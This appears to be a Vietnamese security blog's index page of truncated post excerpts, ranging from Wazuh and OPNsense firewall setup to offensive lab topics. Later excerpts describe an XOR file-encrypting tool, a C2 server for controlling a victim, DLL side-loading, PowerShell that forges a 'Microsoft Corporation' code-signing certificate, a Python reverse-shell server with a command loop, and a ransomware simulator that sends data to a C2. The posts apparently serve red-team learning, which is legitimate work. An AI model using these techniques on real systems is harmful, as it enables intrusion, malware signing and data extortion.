1. Tổng quan Wazuh là một nền tảng bảo mật cung cấp khả năng thống nhất XDR và SIEM bảo vệ cho các máy trạm và máy chủ. Giải pháp bao gồm một agent dùng chung duy nhất và 3 thành phần trung tâm: Wazuh Server, Wazuh Indexer và Wazuh dashboard. Wazuh là nền tảng […]
Continue ReadingCấu hình DNS&DHCP Ở đây trong mô hình lab minh sẽ sử dụng Dnsmasq DNS & DHCP. Với doanh nghiệp từ 1000 user trở lại bạn cũng nên sử dụng phần này. B1: Mình sẽ chọn General, Enabled cho interface LAN B2: Kiểm tra DHCP ranges B3: Thử 1 client kiểm tra có cấp IP […]
Continue ReadingPhần cứng yêu cầu Việc lựa chọn phần cứng là bước quan trọng trong khi triển khai OPNsense. Hệ thống có thể chạy trên nhiều loại thiết bị: Cần lựa chọn phần cứng phù hợp với: OPNsense hỗ trợ kiến trúc x86-64 (amd64), bắt buộc cho hệ thống hiện đại Phần cứng tối thiểu Khuyến […]
Continue ReadingGiới thiệu OPNsense là một nền tảng tường lửa (firewall) và định tuyến (routing) mã nguồn mở, được xây dựng dựa trên hệ điều hành FreeBSD Hệ thống được thiết kế với mục tiêu: Tính năng OPNsense cung cấp nhiều tính năng cao cấp tương đương firewall thương mại. Các tính năng nổi bật: Các […]
Continue Readingenc_v1 Đây là chương trình C để mã hóa các file .doc, .docx, .xls, .xlsx bằng XOR và đổi phần mở rộng sang .enc tại thư mục đường dẫn khai báo khi chạy chương trình. Ở phiên bản version 1 này thì mình chỉ thực hiện mã hóa 1 cách bình thường. với version 1 […]
Continue ReadingCông cụ này mình nhờ chatgpt và dựa trên một số tình huống trong quá trình làm việc thực tế. B1:chạy c2_server.exe trên máy attacker, sau khi chạy xong thì server sẽ start dịch vụ web trên port 8000 B2:mở trình duyệt web để truy cập vào http://ip_attacker:8000 (sử dụng phần này để control victim […]
Continue ReadingDLL Side Loading (hay dll search order hijacking) là một kỹ thuật trong đó kẻ tấn công giả mạo một file DLL và ép một ứng dụng hợp pháp load DLL giả này thay vì bản gốc. Điều này cho phép thực thi mã độc trong ngữ cảnh của ứng dụng tin cậy (Signed, trusted). […]
Continue ReadingB1: Sử dụng code powershell sau đây để tạo file hello.exe $code = @”using System;public class HelloWorld {public static void Main() {Console.WriteLine(“Hello World”);Console.ReadLine();}}“@ Add-Type -TypeDefinition $code -OutputAssembly “hello.exe” -OutputType ConsoleApplication B2: chạy thử hello.exe để xem kết quả B3: Tạo certificate giả mạo “Microsoft Corporation” bằng code powershell sau đây # Định nghĩa thông tin […]
Continue Reading1. Viết Tcp Connection đơn giản với Python tcpServer.py tcpClient import socketdef connect(): s = socket.socket() s.bind((“0.0.0.0”,12345)) s.listen(1) conn , addr = s.accept() print(‘[+] We got a connection from’, addr) while True: command = input(“Shell> “) if ‘terminate’ in command: conn.send(‘terminate’.encode()) conn.close() break else: try: conn.send(command.encode()) print(conn.recv(4096).decode()) except ValueError as ve: print(ve)connect() import socketimport subprocess def […]
Continue ReadingĐây là một công cụ giúp bạn mô phỏng quá trình mã hóa của một ransomware trong hệ thống sử dụng powershell, cùng với đó là khởi tạo kết nối đến C2 server để gửi dữ liệu. Tham khảo thêm tại link sau: Sau đây là cách thức thực hiện: B1: Dựng C2 Server, ở […]
Continue Reading